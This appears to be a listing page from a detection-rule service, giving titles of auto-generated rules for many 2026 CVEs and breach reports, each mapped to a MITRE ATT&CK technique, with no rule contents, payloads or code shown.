🌐 NVDT1078.004 — Persistence
Auto-generated from D-Link DIR-600L EOL Router Exposes Critical Telnet Backdoor
🛡️ 2 more rules via /detect
CVE-2026-42374 D-Link DIR-600L Hardcoded Telnet Backdoor Login Attempt
🌐 NVDT1110.001 — Credential Access
Auto-generated from D-Link DIR-600L EOL Router Has Hardcoded Telnet Backdoor
🛡️ 2 more rules via /detect
CVE-2026-42373 - D-Link DIR-605L Telnet Backdoor Login
🌐 NVDT1078.004 — Persistence
Auto-generated from D-Link DIR-605L EOL Router Hit by Critical Telnet Backdoor
🛡️ 3 more rules via /detect
CVE-2026-42076: Evolver Engine _extractLLM() Command Injection
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-42076: Evolver Engine RCE Puts AI Agents at Risk
🛡️ 2 more rules via /detect
vm2 Sandbox Escape to Host Command Execution - CVE-2026-26956
🌐 NVDT1059.003 — Execution
Auto-generated from vm2 Sandbox Escape Vulnerability (CVE-2026-26956) Allows ...
🛡️ 2 more rules via /detect
vm2 Sandbox Escape via SuppressedError - CVE-2026-26332
🌐 NVDT1059.003 — Execution
Auto-generated from vm2 Sandbox Escape (CVE-2026-26332) Exposes Node.js Apps ...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-25293
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-25293: Critical PLC Buffer Overflow Puts Industr...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-24781
🌐 NVDT1190 — Initial Access
Auto-generated from VM2 Sandbox Escape Vulnerability (CVE-2026-24781) Exposes...
🛡️ 2 more rules via /detect
CVE-2026-24120: vm2 Sandbox Escape - Host Command Execution via Node.js
🌐 NVDT1059.003 — Execution
Auto-generated from CVE-2026-24120: vm2 Sandbox Escape Allows Host Command Ex...
🛡️ 2 more rules via /detect
VM2 Sandbox Breakout via vm.constructor.constructor - CVE-2026-24118
🌐 NVDT1059.003 — Execution
Auto-generated from VM2 Sandbox Breakout Vulnerability: Critical Flaw Exposes...
🛡️ 2 more rules via /detect
Ransomware Indicators — Mediaworks Supply Chain
Breach Intelransomware — event-type
Auto-generated from Ransomware Group Claims Breach of Hungarian Media Firm Me...
🛡️ 1 more rules via /detect
Free Tier - GitHub RCE via Malicious Commit
Breach IntelT1059.004 — Execution
Auto-generated from AI Phishing, Android Spyware, Linux Exploit, GitHub RCE H...
🛡️ 2 more rules via /detect
CVE-2025-58074 - Norton Secure VPN Privilege Escalation via File Replacement
🌐 NVDT1548.001 — Privilege Escalation
Auto-generated from Norton Secure VPN Privilege Escalation via Microsoft Stor...
🛡️ 2 more rules via /detect
CVE-2026-7482: Ollama API Create Endpoint GGUF Upload
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7482: Critical Ollama Heap Out-of-Bounds Read Ex...
🛡️ 2 more rules via /detect
Exploitation Attempt — Progress Software
Breach Intelvulnerability — event-type
Auto-generated from MOVEit Automation Critical Auth Bypass Flaw Requires Imme...
Kaikatsu Club Data Breach - Large Data Extraction
Breach IntelT1119 — Collection
Auto-generated from Kaikatsu Club Breach: 17-Year-Old Exposes 7 Million Users...
🛡️ 2 more rules via /detect
Linux Copy Fail Privilege Escalation
Breach IntelT1068 — Privilege Escalation
Auto-generated from CISA Warns: 'Copy Fail' Linux Root Vulnerability Actively...
🛡️ 2 more rules via /detect
CVE-2026-7750 Totolink N300RH setMacFilterRules Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink N300RH RCE: CVE-2026-7750 Buffer Overflow Affect...
Web Application Exploitation Attempt — CVE-2026-7749
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink N300RH Router Hit by High-Severity Buffer Overfl...
🛡️ 2 more rules via /detect
CVE-2026-7748 - Totolink N300RH Buffer Overflow via setUpgradeFW
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink N300RH Buffer Overflow (CVE-2026-7748) Remotely ...
🛡️ 1 more rules via /detect
GnuTLS DTLS Heap Overflow - CVE-2026-33846 - Initial Access
🌐 NVDT1190 — Initial Access
Auto-generated from GnuTLS DTLS Heap Overflow (CVE-2026-33846) Poses Remote T...
🛡️ 1 more rules via /detect
cPanel Vulnerability Exploitation via Specific URI Path
Breach IntelT1190 — Initial Access
Auto-generated from cPanel Vulnerability Weaponized Against Gov, Military, an...
🛡️ 2 more rules via /detect
cPanel Exploit - Suspicious URI Pattern
Breach IntelT1190 — Initial Access
Auto-generated from cPanel Exploited: Over 40,000 Systems Compromised Globally
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7747
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink N300RH Critical Buffer Overflow: Public Exploit ...
🛡️ 2 more rules via /detect
CVE-2025-14320: Tegsoft Online Support Reflected XSS Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2025-14320: Critical XSS in Tegsoft Online Support Ap...
🛡️ 2 more rules via /detect
CVE-2026-7736: GoBGP parseRibEntry Integer Underflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7736: GoBGP Integer Underflow Threatens BGP Routing
Instructure Data Breach - Suspicious Web Request Pattern
Breach IntelT1190 — Initial Access
Auto-generated from Instructure Data Breach: Student Data Stolen, Services Di...
🛡️ 2 more rules via /detect
cPanel Web Shell Upload via Vulnerable Endpoint
Breach IntelT1190 — Initial Access
Auto-generated from cPanel Bug Exposes Millions of Websites to Takeover
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7735
🌐 NVDT1190 — Initial Access
Auto-generated from osrg GoBGP Buffer Overflow (CVE-2026-7735) Poses Remote T...
🛡️ 2 more rules via /detect
CVE-2026-7733: funadmin Unrestricted File Upload via Chunk Upload
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7733: funadmin Unrestricted File Upload Exposes ...
🛡️ 2 more rules via /detect
Crypto Scam Center Fraudulent Investment Website Access
Breach IntelT1566.002 — Initial Access
Auto-generated from Global Law Enforcement Cracks Down on Crypto Scam Centers...
🛡️ 2 more rules via /detect
CVE-2026-7727: Shandong Hoteam PDM SQL Injection via GetQueryMachineGridOnePageData
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7727: Shandong Hoteam Software PDM SQL Injection
🛡️ 2 more rules via /detect
Reborn Gaming Breach - cPanel/WHM Data Exposure
Breach IntelT1119 — Impact
Auto-generated from Reborn Gaming Breach: cPanel/WHM Vulnerability Exposes Us...
🛡️ 2 more rules via /detect
CVE-2026-7723: Prefect WebSocket Unauthenticated API Access
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7723: PrefectHQ Prefect WebSocket Lacks Authenti...
🛡️ 1 more rules via /detect
CVE-2026-7711 - MindsDB Unrestricted File Upload via BYOM Handler
🌐 NVDT1190 — Initial Access
Auto-generated from MindsDB Unrestricted File Upload (CVE-2026-7711) Poses Re...
🛡️ 2 more rules via /detect
CVE-2026-7710: YunaiV yudao-cloud Improper Authentication via Mock Token
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7710: YunaiV yudao-cloud Improper Authentication...
🛡️ 1 more rules via /detect
Marcus & Millichap Data Exfiltration via ShinyHunters
Breach IntelT1048 — Exfiltration
Auto-generated from Marcus & Millichap Breach: ShinyHunters Leaks 1.8M Records
🛡️ 2 more rules via /detect
Instructure Data Exfiltration via ShinyHunters
Breach IntelT1041 — Exfiltration
Auto-generated from Instructure Confirms Data Breach as ShinyHunters Claims A...
🛡️ 2 more rules via /detect
AV Stumpfl Pixera Websocket API Code Injection - CVE-2026-7703
🌐 NVDT1190 — Initial Access
Auto-generated from AV Stumpfl Pixera Two Media Server Websocket API Code Inj...
🛡️ 1 more rules via /detect
Tiandy Easy7 updateDbBackupInfo OS Command Injection - CVE-2026-7698
🌐 NVDT1190 — Initial Access
Auto-generated from Tiandy Easy7 RCE: Unauthenticated OS Command Injection vi...
🛡️ 1 more rules via /detect
CVE-2026-7695 - Acrel EEMS SQL Injection via fCircuitids
🌐 NVDT1190 — Initial Access
Auto-generated from Acrel Electrical EEMS Platform Hit by High-Severity SQL I...
🛡️ 2 more rules via /detect
SQL Injection in Acrel ECEMS fCircuitids Parameter — CVE-2026-7694
🌐 NVDT1190 — Initial Access
Auto-generated from Acrel Electrical ECEMS SQLi (CVE-2026-7694) Exposes Micro...
🛡️ 2 more rules via /detect
CVE-2026-7685 - Edimax BR-6208AC setWAN Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from Edimax BR-6208AC Buffer Overflow: Remote Exploit Public (...
CVE-2026-7684 - Edimax BR-6428nC /goform/setWAN Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from Edimax BR-6428nC Buffer Overflow (CVE-2026-7684) Exposed,...
CVE-2026-5063: NEX-Forms Stored XSS via submit_nex_form POST parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-5063: NEX-Forms WordPress Plugin Stored XSS
🛡️ 2 more rules via /detect
YunaiV Yudao-Cloud Authentication Bypass Attempt (CVE-2026-7679)
🌐 NVDT1190 — Initial Access
Auto-generated from YunaiV yudao-cloud Authentication Bypass (CVE-2026-7679) ...
🛡️ 1 more rules via /detect
CVE-2026-7675: LBT-T300-HW1 start_lan Buffer Overflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7675: Shenzhen Libituo LBT-T300-HW1 Buffer Overf...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7674
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7674: Libituo LBT-T300-HW1 Buffer Overflow Poses...
🛡️ 2 more rules via /detect
CVE-2026-7670 - Jinher OA 1.0 UserSel.aspx SQL Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Jinher OA 1.0 SQL Injection (CVE-2026-7670) Exposes Data ...
🛡️ 2 more rules via /detect
MikroTik RouterOS SCEP Endpoint Out-of-Bounds Read - CVE-2026-7668
🌐 NVDT1190 — Initial Access
Auto-generated from MikroTik RouterOS 6.49.8 SCEP Endpoint Vulnerability (CVE...
Lapsus$ Trivy Credential Theft via Copy Fail Exploit
Breach IntelT1078.004 — Credential Access
Auto-generated from Lapsus$ Claims Checkmarx Breach, Google Adjusts Bug Bount...
🛡️ 2 more rules via /detect
CVE-2026-7644 - ChatGPTNextWeb NextChat Improper Authorization
🌐 NVDT1190 — Initial Access
Auto-generated from ChatGPTNextWeb NextChat Improper Authorization Vulnerabil...
🛡️ 1 more rules via /detect
CVE-2026-7632: SQL Injection in Online Hospital Management System viewappointment.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7632: SQL Injection in Online Hospital Managemen...
🛡️ 2 more rules via /detect
CVE-2026-7630: InnoShop Installation Endpoint Access
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7630: InnoShop Improper Authentication Exposes I...
🛡️ 2 more rules via /detect
WCFM Customer Deletion via IDOR - CVE-2026-2554
🌐 NVDT1531 — Impact
Auto-generated from WCFM Frontend Manager: Critical IDOR Allows Admin Deletion
🛡️ 2 more rules via /detect
WordPress Salon Booking Plugin Arbitrary File Read via Email Attachment - CVE-2026-6320
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Salon Booking Plugin: Arbitrary File Read via E...
🛡️ 2 more rules via /detect
CVE-2026-4100 - Paid Memberships Pro Stripe Webhook Unauthorized Modification
🌐 NVDT1531 — Impact
Auto-generated from Paid Memberships Pro Plugin: Stripe Webhook Vulnerability...
🛡️ 3 more rules via /detect
WordPress Geo Mashup Plugin Unauthenticated SQL Injection - CVE-2026-4062
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Geo Mashup Plugin: Unauthenticated SQL Injectio...
🛡️ 2 more rules via /detect
CVE-2026-4061: Geo Mashup WordPress Plugin SQL Injection via map_post_type
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-4061: Geo Mashup WordPress Plugin SQL Injection
🛡️ 2 more rules via /detect
WordPress Geo Mashup Plugin SQLi via 'sort' Parameter - CVE-2026-4060
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Geo Mashup Plugin SQLi via 'sort' Parameter (CV...
🛡️ 2 more rules via /detect
CVE-2026-7491 - Zyosoft School App IOD - Unauthorized Data Access
🌐 NVDT1190 — Initial Access
Auto-generated from Zyosoft School App IOD Vulnerability Exposes Student Data
🛡️ 2 more rules via /detect
CVE-2026-7490 - Sunnet CTMS/CPAS Arbitrary File Upload Webshell
🌐 NVDT1190 — Initial Access
Auto-generated from Sunnet CTMS/CPAS Arbitrary File Upload Allows RCE
🛡️ 2 more rules via /detect
CVE-2026-7489 Sunnet CTMS SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Sunnet CTMS SQL Injection (CVE-2026-7489) Exposes Databases
🛡️ 2 more rules via /detect
CVE-2026-5324: Brizy Unauthenticated Stored XSS via Form Submission
🌐 NVDT1190 — Initial Access
Auto-generated from Brizy WordPress Plugin CVE-2026-5324: Unauthenticated Sto...
🛡️ 1 more rules via /detect
CVE-2026-7649 - ARMember SQL Injection via orderby parameter
🌐 NVDT1190 — Initial Access
Auto-generated from ARMember WordPress Plugin Vulnerable to SQL Injection
🛡️ 2 more rules via /detect
CVE-2026-7607 TRENDnet TEW-821DAP Firmware Update Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from TRENDnet TEW-821DAP Buffer Overflow (CVE-2026-7607) Poses...
🛡️ 1 more rules via /detect
CVE-2026-6229: Royal Elementor SSRF via render_csv_data
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6229: Royal Elementor Addons Plugin Vulnerable t...
🛡️ 2 more rules via /detect
CVE-2026-20252: WordPress Widget Options RCE via Display Logic
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-2052: WordPress Plugin RCE Exposes Sites to Cont...
🛡️ 2 more rules via /detect
Trellix Source Code Repository Access - Unauthorized Git Operations
Breach IntelT1190 — Initial Access
Auto-generated from Trellix Confirms Source Code Breach After Unauthorized Re...
🛡️ 2 more rules via /detect
Web Shell Activity Detection — CVE-2026-7647
🌐 NVDT1505.003 — Persistence
Auto-generated from WordPress Profile Builder Pro: Unauthenticated PHP Object...
🛡️ 3 more rules via /detect
PixelYourSite Pro Plugin SSRF via scan_video - CVE-2026-7049
🌐 NVDT1190 — Initial Access
Auto-generated from PixelYourSite Pro Plugin SSRF Vulnerability (CVE-2026-7049)
🛡️ 2 more rules via /detect
CVE-2026-5113: Gravity Forms Stored XSS via Consent Field
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-5113: Gravity Forms XSS via Flawed Consent Field...
🛡️ 2 more rules via /detect
CVE-2026-5112: Gravity Forms Unauthenticated Stored XSS via Calculation Product Field
🌐 NVDT1190 — Initial Access
Auto-generated from Gravity Forms Plugin: Unauthenticated Stored XSS Puts Wor...
🛡️ 1 more rules via /detect
CVE-2026-5111: Gravity Forms Stored XSS via Hidden Product Field
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-5111: Gravity Forms Plugin Hit by Stored XSS
🛡️ 1 more rules via /detect
CVE-2026-5110: Gravity Forms Unauthenticated Stored XSS via SingleProduct in Repeater
🌐 NVDT1190 — Initial Access
Auto-generated from Gravity Forms Plugin: Unauthenticated Stored XSS in WordP...
🛡️ 2 more rules via /detect
WordPress Gravity Forms Stored XSS - Unauthenticated Script Injection - CVE-2026-5109
🌐 NVDT1190 — Initial Access
Auto-generated from Gravity Forms Plugin Stored XSS: Unauthenticated Attacker...
🛡️ 1 more rules via /detect
ZenBusiness Data Exfiltration via Compromised Third-Party Platforms
Breach IntelT1041 — Exfiltration
Auto-generated from ZenBusiness Breach: ShinyHunters Exfiltrates 5M Records f...
🛡️ 2 more rules via /detect
CVE-2026-7641: WordPress Multisite Privilege Escalation via Profile Update
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7641: WordPress Multisite Privilege Escalation V...
🛡️ 2 more rules via /detect
CVE-2026-7458: WordPress User Verification Plugin Auth Bypass
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7458: WordPress Plugin Auth Bypass Exposes Admins
🛡️ 1 more rules via /detect
CVE-2026-6963: WP Mail Gateway AJAX Action Unauthorized Configuration Update
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from CVE-2026-6963: WordPress WP Mail Gateway Plugin Allows Pr...
🛡️ 2 more rules via /detect
CVE-2026-4882: WordPress User Registration Advanced Fields Arbitrary File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-4882: WordPress Plugin Arbitrary File Upload Cri...
🛡️ 2 more rules via /detect
Argo CD ServerSideDiff Secret Disclosure - CVE-2026-43824
🌐 NVDT1552.001 — Credential Access
Auto-generated from Argo CD CVE-2026-43824: Critical Kubernetes Secret Disclo...
🛡️ 1 more rules via /detect
CVE-2026-7598 libssh2 userauth_password Integer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from libssh2 Integer Overflow (CVE-2026-7598) Exposes Remote A...
CVE-2026-7594: Flux159 mcp-game-asset-gen Path Traversal Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7594: Flux159 mcp-game-asset-gen Path Traversal ...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7593
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7593: Sunwood-ai-labs Command-Executor OS Comman...
🛡️ 2 more rules via /detect
SQL Injection in itsourcecode Courier Management System edit_staff.php - CVE-2026-7592
🌐 NVDT1190 — Initial Access
Auto-generated from itsourcecode Courier Management System SQLi (CVE-2026-759...
🛡️ 2 more rules via /detect
CVE-2026-7590: OS Command Injection in eyal-gor p_69_branch_monkey_mcp Preview Endpoint
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7590: OS Command Injection in eyal-gor p_69_bran...
🛡️ 2 more rules via /detect
CVE-2025-52347: DirectIo64.sys IOCTL for Privilege Escalation
🌐 NVDT1068 — Privilege Escalation
Auto-generated from CVE-2025-52347: PassMark Drivers Expose Kernel to Privile...
🛡️ 1 more rules via /detect
AccountDumpling Phishing via Google AppSheet
Breach IntelT1566.002 — Initial Access
Auto-generated from Facebook Accounts Hacked via Google AppSheet Phishing Cam...
🛡️ 2 more rules via /detect
France Titres Data Exfiltration via Suspicious Web Request
Breach IntelT1041 — Exfiltration
Auto-generated from France Titres Data Breach: 15-Year-Old Detained for Selli...
🛡️ 2 more rules via /detect
CVE-2026-37541: OVMS3 GVRET Binary Data Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from OVMS3 CVE-2026-37541: Critical Buffer Overflow Exposes EV...
🛡️ 2 more rules via /detect
CVE-2026-37540: OpenAMP ELF Loader Integer Overflow in Firmware Parsing
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-37540: OpenAMP ELF Loader Integer Overflow Expos...
🛡️ 1 more rules via /detect
CVE-2026-37539: Critical Buffer Overflow in Cannelloni CAN FD Parsing - Initial Access
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-37539: Critical Buffer Overflow in Cannelloni CA...
🛡️ 2 more rules via /detect
CVE-2026-37537: Open-SAE-J1939 Integer Underflow Out-of-Bounds Write
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-37537: Integer Underflow in Open-SAE-J1939 Leads...
🛡️ 1 more rules via /detect
CVE-2026-37536: UDS Diagnostic Request Stack Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-37536: Stack Buffer Overflow in miaofng/uds-c
🛡️ 1 more rules via /detect
CVE-2026-37535 - openxc/isotp-c Out-of-Bounds Read via Malicious CAN Frame
🌐 NVDT1190 — Initial Access
Auto-generated from openxc/isotp-c Out-of-Bounds Read: DoS and Info Leak via ...
🛡️ 1 more rules via /detect
CVE-2026-37532: Heap Over-Read in AGL agl-service-can-low-level isotp_continue_receive
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-37532: Heap Over-Read in AGL agl-service-can-low...
🛡️ 1 more rules via /detect
CVE-2026-37531 - AGL app-framework-main Zip Slip and TOCTOU Widget Installation
🌐 NVDT1505.003 — Persistence
Auto-generated from AGL app-framework-main Critical Zip Slip + TOCTOU Vulnera...
🛡️ 2 more rules via /detect
CVE-2026-37526 - AGL app-framework-binder Local Privilege Escalation via Supervision Socket
🌐 NVDT1219 — Privilege Escalation
Auto-generated from AGL app-framework-binder CVE-2026-37526 Allows Local Priv...
🛡️ 2 more rules via /detect
Privilege Escalation via AGL app-framework-binder Supervision Do Command - CVE-2026-37525
🌐 NVDT1068 — Privilege Escalation
Auto-generated from AGL app-framework-binder Privilege Escalation (CVE-2026-3...
🛡️ 1 more rules via /detect
Instructure Canvas Breach: Salesforce Instance Compromise via Social Engineering
Breach IntelT1190 — Initial Access
Auto-generated from Instructure Canvas Breach: Social Engineering Exploits Sa...
🛡️ 2 more rules via /detect
Vanetza V2X GeoNetworking Packet DoS Attempt — CVE-2026-37554
🌐 NVDT1499 — Impact
Auto-generated from Vanetza V2X Vulnerability: CVE-2026-37554 Allows Remote DoS
🛡️ 2 more rules via /detect
cPanel CVE-2026-41940 Unauthenticated Remote Code Execution
Breach IntelT1190 — Initial Access
Auto-generated from cPanel Critical Vulnerability CVE-2026-41940 Demands Imme...
🛡️ 2 more rules via /detect
SHADOW-EARTH-053 Initial Access via Exploited Web Application
Breach IntelT1190 — Initial Access
Auto-generated from China-Linked SHADOW-EARTH-053 Targets Asian Governments, ...
🛡️ 2 more rules via /detect
CVE-2026-3772: WP Editor Plugin Arbitrary File Overwrite via CSRF
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-3772: WP Editor Plugin CSRF Allows Remote Code E...
🛡️ 2 more rules via /detect
Web Shell Activity Detection — CVE-2026-42779
🌐 NVDT1505.003 — Persistence
Auto-generated from CVE-2026-42779: Apache MINA Deserialization Flaw Allows R...
🛡️ 1 more rules via /detect
Web Shell Activity Detection — CVE-2026-42778
🌐 NVDT1505.003 — Persistence
Auto-generated from Apache MINA Deserialization Vulnerability (CVE-2026-42778...
🛡️ 3 more rules via /detect
CVE-2026-7567: WordPress Temporary Login Auth Bypass Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7567: WordPress Temporary Login Plugin Critical ...
🛡️ 2 more rules via /detect
Suspicious Ruby Gem Installation - BufferZoneCorp Supply Chain
Breach IntelT1190 — Initial Access
Auto-generated from Poisoned Ruby Gems and Go Modules Hijack CI/CD Pipelines ...
🛡️ 2 more rules via /detect
CVE-2026-43003 - Ironic Python Agent Grub Install Chroot Execution
🌐 NVDT1574.002 — Persistence
Auto-generated from OpenStack Ironic Python Agent Vulnerability CVE-2026-4300...
🛡️ 1 more rules via /detect
OpenStack Keystone CVE-2026-43001 - Unauthorized EC2 Credential Creation
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from OpenStack Keystone CVE-2026-43001 Allows Cross-Project La...
🛡️ 2 more rules via /detect
CVE-2026-42403: Apache Neethi Circular Reference DoS Attempt
🌐 NVDT1499 — Impact
Auto-generated from CVE-2026-42403: Apache Neethi DoS Vulnerability via Circu...
🛡️ 1 more rules via /detect
CVE-2026-42402: Apache Neethi DoS via Algorithmic Complexity
🌐 NVDT1499 — Impact
Auto-generated from CVE-2026-42402: Apache Neethi DoS via Policy Normalization
🛡️ 1 more rules via /detect
CVE-2026-7584: LabOne Q Arbitrary Code Execution via Deserialization
🌐 NVDT1574.002 — Execution
Auto-generated from CVE-2026-7584: LabOne Q Deserialization Leads to Arbitrar...
🛡️ 2 more rules via /detect
Insider Facilitated BlackCat Ransomware Deployment
Breach IntelT1070 — Defense Evasion
Auto-generated from US Ransomware Negotiators Jailed for BlackCat Attacks
🛡️ 2 more rules via /detect
Supply Chain Compromise via Lightning or Intercom Packages
Breach IntelT1190 — Initial Access
Auto-generated from Supply Chain Attack Hits SAP, Lightning, Intercom Users
🛡️ 2 more rules via /detect
CVE-2026-7555 - itsourcecode EJS Login SQL Injection
🌐 NVDT1190 — Initial Access
Auto-generated from itsourcecode Electronic Judging System 1.0 SQL Injection ...
🛡️ 1 more rules via /detect
CVE-2026-7550: SQL Injection in Pharmacy System ajax.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7550: Remote SQLi Hits Pharmacy Sales and Invent...
🛡️ 2 more rules via /detect
CVE-2026-7549: SourceCodester Pharmacy SQLi via ajax.php delete_customer
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7549: SourceCodester Pharmacy System SQLi Vulner...
🛡️ 2 more rules via /detect
CVE-2026-7548 Totolink NR1800X Command Injection via setUssd
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink NR1800X Command Injection (CVE-2026-7548) Public...
🛡️ 2 more rules via /detect
CVE-2026-7546: Totolink NR1800X lighttpd Host Header Stack Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7546: Critical Stack Buffer Overflow in Totolink...
🛡️ 1 more rules via /detect
CVE-2026-7545: SourceCodester School Management checkEmail SQL Injection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7545: SourceCodester School Management SQLi Expo...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7538
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A8000RU Critical OS Command Injection (CVE-2026-...
🛡️ 2 more rules via /detect
CVE-2026-7519: Fujian Apex LiveBOS Path Traversal via UploadImage.do
🌐 NVDT1190 — Initial Access
Auto-generated from Fujian Apex LiveBOS Path Traversal (CVE-2026-7519) Expose...
🛡️ 2 more rules via /detect
CVE-2026-7513 - UTT HiPER 1200GW Remote Control Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from UTT HiPER 1200GW Buffer Overflow (CVE-2026-7513) Exposes ...
CVE-2026-7512 - UTT HiPER 1200GW /goform/formUser Buffer Overflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from UTT HiPER 1200GW Buffer Overflow (CVE-2026-7512) Poses Re...
🛡️ 1 more rules via /detect
Wireshark Profile Import Path Traversal - CVE-2026-5656
🌐 NVDT1190 — Initial Access
Auto-generated from Wireshark Path Traversal (CVE-2026-5656) Allows RCE
🛡️ 2 more rules via /detect
Wireshark RDP Dissector Crash DoS Attempt - CVE-2026-5405
🌐 NVDT1200 — Defense Evasion
Auto-generated from Wireshark RDP Dissector Crash (CVE-2026-5405) Allows DoS,...
🛡️ 1 more rules via /detect
Wireshark SBC Codec DoS/RCE Attempt - CVE-2026-5403
🌐 NVDT1203 — Exploitation for Client Execution
Auto-generated from Wireshark CVE-2026-5403: SBC Codec Crash Allows DoS and RCE
🛡️ 1 more rules via /detect
CVE-2026-7506 SourceCodester Hotel Management SQL Injection - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from SourceCodester Hotel Management System SQLi (CVE-2026-750...
🛡️ 2 more rules via /detect
CVE-2026-7505 - Nextlevelbuilder GoClaw RPC Improper Authorization
🌐 NVDT1190 — Initial Access
Auto-generated from nextlevelbuilder GoClaw RPC Handler Flaw Allows Remote Im...
🛡️ 2 more rules via /detect
CVE-2026-7551: OpenHarness /bridge Command Injection
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-7551: HKUDS OpenHarness RCE Flaw Exposes Sensiti...
🛡️ 2 more rules via /detect
CVE-2026-7503: Remote Buffer Overflow in code-projects cstecgi.cgi setWiFiMultipleConfig
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7503: Remote Buffer Overflow in code-projects Pl...
🛡️ 2 more rules via /detect
CVE-2026-6543 - Langflow Arbitrary Command Execution via API
🌐 NVDT1059 — Execution
Auto-generated from IBM Langflow Desktop RCE (CVE-2026-6543) Allows Arbitrary...
🛡️ 2 more rules via /detect
IBM Turbonomic Agent Excessive Permissions - CVE-2026-6389
🌐 NVDT1068 — Privilege Escalation
Auto-generated from IBM Turbonomic Agent CVE-2026-6389: Cluster-Wide Secret E...
🛡️ 2 more rules via /detect
CVE-2026-7435 - SSCMS v7.4.0 SQLi via dynamic endpoint
🌐 NVDT1190 — Initial Access
Auto-generated from SSCMS v7.4.0 SQLi: High-Severity Database Compromise Risk
🛡️ 2 more rules via /detect
CVE-2026-4503: IBM Langflow Desktop Image Disclosure via IOR
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-4503: IBM Langflow Desktop Exposes User Images v...
🛡️ 1 more rules via /detect
CVE-2026-7461: Amazon ECS Agent SYSTEM Privilege Escalation via FSx Volume Mount
🌐 NVDT1059.003 — Privilege Escalation
Auto-generated from CVE-2026-7461: Amazon ECS Agent Vulnerability Allows SYST...
🛡️ 2 more rules via /detect
CVE-2026-40904 - Chartbrew Cross-Project Data Access
🌐 NVDT1078.004 — Defense Evasion
Auto-generated from Chartbrew CVE-2026-40904 Exposes Cross-Project Data in v4...
🛡️ 2 more rules via /detect
Chartbrew Unauthenticated Chart Data Exposure via POST /api/chart/:chart_id/query - CVE-2026-40601
🌐 NVDT1190 — Initial Access
Auto-generated from Chartbrew CVE-2026-40601: Unauthenticated Data Exposure
🛡️ 1 more rules via /detect
CVE-2026-40600: Chartbrew Cross-Project SharePolicy Manipulation (Free Tier)
🌐 NVDT1531 — Impact
Auto-generated from Chartbrew CVE-2026-40600: Cross-Project SharePolicy Manip...
🛡️ 1 more rules via /detect
Chartbrew Unauthenticated Public Chart Data Exposure - CVE-2026-40595
🌐 NVDT1190 — Initial Access
Auto-generated from Chartbrew CVE-2026-40595: Unauthenticated Data Exposure f...
🛡️ 2 more rules via /detect
GnuTLS DTLS Handshake Underflow Exploit Attempt - CVE-2026-33845
🌐 NVDT1190 — Initial Access
Auto-generated from GnuTLS Vulnerability CVE-2026-33845: Underflow Leads to R...
🛡️ 2 more rules via /detect
